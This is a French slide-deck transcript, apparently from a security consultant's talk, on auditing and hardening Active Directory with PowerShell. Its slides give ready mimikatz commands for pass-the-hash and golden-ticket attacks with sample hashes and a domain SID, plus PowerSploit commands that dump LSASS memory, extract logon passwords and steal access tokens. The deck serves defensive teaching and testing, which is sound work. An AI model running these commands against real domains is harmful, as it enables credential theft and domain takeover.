Tester la sécurité de son annuaire Active Directory avec PowerShell

Slides:



Advertisements
Présentations similaires
Vue d'ensemble Vue d'ensemble de la sécurité dans Windows Server 2003
Advertisements

Configuration de Windows Server 2008 Active Directory
Présentation de Windows 2000 Quest-ce que Windows 2000? 2 versions principales : 1.Windows 2000 Professionnel : Système dexploitation client (comme Windows.
Module 8 : Maintenance des logiciels à l'aide des services SUS
Module 3 : Création d'un domaine Windows 2000
Module 3 : Création d'un domaine Windows 2000
La solution KoXo Administrator
Travail réalisé par : Abdessamad BOUTGAYOUT Encadré par : Mr. Ahmed REBBANI LP SRI - ENSET Mohammedia
Votre rayon de soleil ! PROJET EVOLUTION – GMSI 38 Thomas Mouhica, Alexandre Lacombe, Timothé Michel 1.
Windows NT/2000/XP Enjeux et contraintes techniques Douzième partie La sécurité C. Casteyde Document diffusé sous licence GNU FDL.
Séminaire Novembre 2006 Serveur pédagogique : Scribe.
Présentation Scribe NG Serveur pédagogique École Numérique Rurale (Présentation 2009)
Février 2006X. Belanger / Guilde Introduction à. Février 2006X. Belanger / Guilde Qu'est ce que Samba ? ● Implémentation libre du protocole CIFS/SMB (client.
Scribe Serveur pédagogique Séminaire octobre 2009.
République algérienne démocratique et populaire Ministère de la Formation Et de l’Enseignement Professionnel Institut National Spécialisé en Formation.
TP Sécurité - Sécuriser l’accès d’administration en utilisant
Module S41 Chapitre 6 Résolution des problèmes liés au processus d'amorçage et au système.
Eric b, emmanuel l, damien t
Mise en place d’un système de partage de fichiers
Qu’est-ce un serveur de messagerie?
OSPF - Comment OSPF génère les routes par défaut
Sécurité - ASA8.x - Import du Plug-in RDP pour utilisation dans WebVPN
Quels outils collaboratifs pour mon association ?
Concrètement Pascal Sauliere
Présentation Scribe NG Serveur pédagogique.
Folders Access Manager Capacte
Wifi sécurisé et Windows
INSIA SRT 3 PAM !.
Sécurisation de l’accès Internet
Installation et Configuration Internet Information Server (IIS 5)
Mise en place d’un serveur DHCP
Batterie TSE.
Module S41 Chapitre 9  Configuration de Microsoft Windows 7 pour fonctionner sur des réseaux Microsoft.
fonctionnalités iiS iis
Outils Statistiques pour la Sémantique Décembre 2013
Comment fonctionne RADIUS?
Gestion des sécurités sur les comptes User Access Control
Windows 7 NTFS.
Configuration de groupes l'autorisation via ASDM
Cyril Bras Journée « Sécu »
Présentation OCS-Inventory au LAPP
Chapitre 7 Configuration de l'environnement du bureau
Windows Server 2012 Objectifs
Microsoft ® Official Course Module 1 Déploiement et gestion de Windows Server 2012.
Module 1 : Introduction à l'infrastructure Active Directory.
Module 2 : Implémentation d'une structure de forêt et de domaine Active Directory.
Bureau distant sur Windows Vista /2008 Server
Expose : Web Application Firewall.
SERVEUR MICROSOFT. Un serveur pour quoi faire ? Serveur de Fichiers Serveur d’impression Contrôleur de domaine Serveur web Serveur de base de données.
Les protocoles de la couche application Chapitre 7.
Mise en place d'un Serveur Radius pour la sécurité d'un réseau Wireless sous Windows Serveur Présenter par le Stagiaire : Etienne Mamadou Guilavogui.
© Copyright 2017 METSYS. Tous droits réservés
Vue d'ensemble Préparation de l'installation
© Copyright 2017 METSYS. Tous droits réservés
Exposé de système / réseaux IR3
Gestion des sécurités sur les comptes User Access Control
Remote Authentication Dial In User Service RADIUS GAUTHIER Julien.
Module 15 : Implémentation de clients Windows 2000
Prévention de désastre et récupération
Microsoft ® Official Course Module 2 Implémentation du protocole DHCP (Dynamic Host Configuration Protocol)
IFAPME X41 Administrateur serveur
Cours 6238A Configuration et résolution des problèmes des services de domaine Active Directory ® Windows Server ® 2008.
Modern Drivers/BIOS Management Joël Surget Octobre 2018
REPLICA Hyper-V Comme solution à un PRA
Digital Intelligence & data
Implémentation de FTP Rappel sur FTP Relation entre un site Web et FTP
Qu’est ce qu’une page web? Comment fonctionne un site web?
Role-Based Access Control (RBAC) Les permissions d’administration
LES RESEAUX. Besoin de communication LES RESEAUX Pour communiquer via un réseau informatique Support de transmission Carte réseau Éléments de réseau.
Role-Based Access Control (RBAC) Contrôle d’accès basé sur les rôles
Transcription de la présentation:

Tester la sécurité de son annuaire Active Directory avec PowerShell Guillaume MATHIEU MVP Enterprise Security © Copyright 2017 METSYS. Tous droits réservés METSYS La Grande Arche Paroi Nord Paris La défense 92044 Cedex Tel - 01 40 903 341 Fax - 01 40 903 101 www.metsys.fr

Pourquoi cette session Active Directory : annuaire le plus déployé dans les entreprises. Kit d’attaques de la NSA qui a fuité sur Internet. Multiplication du nombre d’attaques depuis 2015. 280 jours en moyenne pour détecter une attaque. Nombreux modules PowerShell pour optimiser et tester la sécurité de son annuaire Active Directory. Maîtriser et sécuriser Active Directory devient un enjeux stratégique. Et PowerShell est votre allié pour cela ! 

Planning La sécurité Active Directory et Active Directory www.metsys.com Planning La sécurité Active Directory et Active Directory Les bonnes pratiques. 2. AuditConnexion, un script PowerShell « fait maison » pour analyser le journal Security de vos contrôleurs de domaine. Réduire les privilèges des comptes d’administration / services 3. Tester la sécurité de votre annuaire Active Directory avec le module PowerShell PowerSploit Présentation avancée de PowerSploit © 2010 Microsoft Corporation. All rights reserved.

1. La sécurité et Active Directory

La sécurité et Active Directory Mise en place d’outils de détection d’attaques (Microsoft Advanced Threat Analytics) Tests d’intrusions Durcissement protocoles authentification (Kerberos, NTLM) Audit des changements liés aux infrastructures et objets Active Directory (Quest Change Auditor, AuditConnection) PRA/PCA Active Directory Sécurisation des postes d’administration (PowerShell V5 / Bitlocker) Automatisation du cycle de vie des objets Gestion des comptes administrateurs locaux (Microsoft LAPS) Durcissement du système d’exploitation Délégation de l’administration (forêt de ressources) Réduction des privilèges des comptes de services Mise en place de politique de mots de passe / MFA Définition de l’architecture cible. Gouvernance de l’annuaire Active Directory

Stockage des mots de passe www.metsys.com Stockage des mots de passe Mot de passe d’un compte utilisateur Active Directory : Stockés sous forme de Hash / empreintes : LMHASH (14127487) : 882B5831DF88FDB77C3113B4A1A5E3A0 NTHASH (14127487) : B8895ECED52341EDFC6A078BB962CB3B Attributs dBCSPwd / UnicodePwd (mot de passe) et lmPwdHistory / ntPwdHistory (historique) protégés par le système Procédure pour récupérer les Hash avec LIBESEDB et NTDSXTRACT. Rainbow Table : retrouver un mot de passe à partir d’un HASH Rainbow Table 17 Go : retrouver tout mot passe à partir de son LMHASH © 2010 Microsoft Corporation. All rights reserved.

Les mots de passe en texte clair / Hash en mémoire www.metsys.com Lancer la console GPMC.MSC. Editer la Default Domain Controller Policy Activer la GPO Network security: Do not store LAN Manager Hash value on next password change. Faire la même action au niveau de la GPO Default Domain Policy. Changer le mot de passe de tous les comptes utilisateurs et ordinateurs. Définir un mot de passe supérieur à 15 caractères pour tous les comptes utilisateurs. Pour les comptes ordinateurs, le système va les changer au bout de 30 jours. Ces 2 actions permettront de supprimer la valeur de l’attribut dBCSPwd. Pour supprimer les valeurs de l’attribut lmPwdHistory, il faut changer le mot de passe un nombre de fois correspondant à l’historique des mots de passe. Vous pouvez forcer les utilisateurs à changer leur mot de passe en cochant la case User must change password at next logon. Le LMHASH est désactivé par défaut sur les contrôleurs de domaine Windows 2008 (paramètre par défaut quand la GPO Network security: Do not store LAN Manager hash value on next password change n’est pas défini / configuré. Cette information a son importance pour les projets de migration de Windows 2000 / 2003 vers Windows 2008 R1 et versions ultérieures. Pour plus d’informations : http://support.microsoft.com/kb/299656/en-us http://support.microsoft.com/kb/946405/en-us © 2010 Microsoft Corporation. All rights reserved.

Version NTLM (négociation…) www.metsys.com Le protocole NTLM Authentification NTLM : Charlie accède au serveur FILE1. DC1 est le contrôleur du domaine. CL1 est la machine de Charlie. 1 - Charlie ouvre sa session 4- CL1 chiffre ce challenge avec NTHASH Charlie et le renvoie 3- FILE1 génère le challenge et l’envoie à CL1 8- Si les deux réponses correspondent, DC1 donne accès à FILE1 7- DC1 compare la réponse générée avec celle reçue par FILE1 2- Charlie accède à File1 6- DC1 génère la réponse avec le challenge et le logon de Charlie 5- FILE1 envoie le logon + challenge + réponse à DC1 FILE1 DC1 Charlie CL1 « Je suis Charlie » Réponse Version NTLM (négociation…) Challenge Réponse DC1 : OK Challenge Logon de Charlie © 2010 Microsoft Corporation. All rights reserved.

Le protocole Kerberos

L’attaque NTLM Pass The Hash www.metsys.com L’attaque NTLM Pass The Hash Comportement standard du protocole NTLM (SSO) Sur une machine distante (ouverture de session réseau) Mot de passe complexe -> vulnérable à cette attaque mimikatz.exe "privilege::debug" "sekurlsa::pth /user:service- ata /ntlm:13b29964cc2480b4ef45 4c59562e675c /domain:msexp76.intra" © 2010 Microsoft Corporation. All rights reserved.

L’attaque Pass the Ticket Mimikatz : http://blog.gentilkiwi.com/

L’attaque Golden Ticket mimikatz.exe "privilege::debug" "kerberos::golden /admin:darkalan /domain:msexp76.intra /id:4000 /sid:S-1-5-21-595127354-1458299726-2062179204 /krbtgt:49918692dbb7808c45b8fefe499bc7f6 /startoffset:0 /endin:600 /renewmax:10080 /ptt“ Nom du domaine : msexp76.intra Krbtgt : 49918692dbb7808c45b8fefe499bc7f6 SID du domaine : S-1-5-21-595127354-1458299726-2062179204

Les jeton d’accès Qu’est ce qu’un jeton d’accès (Access Token) ? www.metsys.com Les jeton d’accès Qu’est ce qu’un jeton d’accès (Access Token) ? Contient les SID du compte utilisateur / groupes Liste des privilèges (comme Debug Programs) de l’utilisateur Jeton d’accès primaire : généré par Lsass.exe à l’ouverture de session Démarrage de Notepad.exe : jeton d’accès primaire est copié / attaché au processus Notepad Processus nécessite permissions (NTFS) ou un privilège (Debug Programs) -> Windows analyse le jeton d’accès LSASS : Local Security Authority Subsystem © 2010 Microsoft Corporation. All rights reserved.

www.metsys.com Voler un jeton d’accès La méthode : dupliquer les jetons d’accès existants et les utilise pour exécuter des tâches Les outils : INCOGNITO 2.0 (à exécuter en System, nécessite les privilèges Debug Programs, Replace a process-level token, Impersonate a client after authentication). La commande PowerShell Invoke-TokenManipulation du module PowerShell PowerSploit © 2010 Microsoft Corporation. All rights reserved.

Comment protégrer son annuaire Active Directory Réduire les privilèges des comptes de services / d’administration Protéger vos stations de travail d’administration (laisse pas traîner ton Hash ) Configurer votre antivirus (détection Mimikatz) Tracer les commandes PowerShell exécutées (PowerShell V5) Désactiver WDIGEST (UseLogonCredential). Désactiver NTLM :    (fausse bonne idée) KB2871997 Déployer LAPS / Advanced Threat Analytics

Bibiographie Guide sur Mimikatz : https://www.scribd.com/document/235639383/Mimikatz-1-4-presentation- fonctionnement-et-contre-mesures-tuto-de-A-a-Z https://www.scribd.com/doc/241252231/Mimikatz-2-4-extraction-de-mots-de-passe- via-un-dump-memoire-tuto-de-a-a-Z https://www.scribd.com/doc/242208711/Mimikatz-3-4-recuperation-de-mot-de- passe-via-Metasploit-et-Meterpreter

2. Analyser le journal Security avec le script PowerShell AuditConnexion de Metsys

Analyse du script AuditConnexion Les principaux événements Windows : ID 4768, 4769, 4624, 4625 GET-EVENTLOG / GET-WINEVENT vs WEVTUTIL : versus

3. Tester la sécurité de votre annuaire Active Directory avec PowerSploit

Installer PowerSploit Télécharger les sources depuis le site web: https://github.com/PowerShellMafia/PowerSploit Copier les sources dans le dossier C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ Débloquer les fichiers : Get-ChildItem –Path C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PowerSploit -Recurse | Unblock-File

Exporter la mémoire du processus LSASS.EXE avec PowerSploit Procédure basée sur la commande Out-Minidump de PowerSploit Exporter le contenu de la mémoire du processus LSASS sous forme d’un fichier. Get-Process Lsass | Out-Minidump -DumpFilePath C:\_adm\Dump Lancer ensuite Mimikatz : sekurlsa::minidump C:\_adm\Dump\lsass_512.dmp sekurlsa::logonpasswords Pour plus d’informations : https://www.scribd.com/doc/241252231/Mimikatz-2-4-extraction-de-mots-de-passe- via-un-dump-memoire-tuto-de-a-a-Z

Exporter la mémoire du processus LSASS.EXE avec PowerSploit Variante avec la commande Invoke-Mimikatz -  Invoke-Mimikatz -command "privilege::debug sekurlsa::logonpasswords"

Voler un jeton d’accès avec PowerSploit Incognito en PowerShell -  Invoke-TokenManipulation –Enumerate nvoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 2696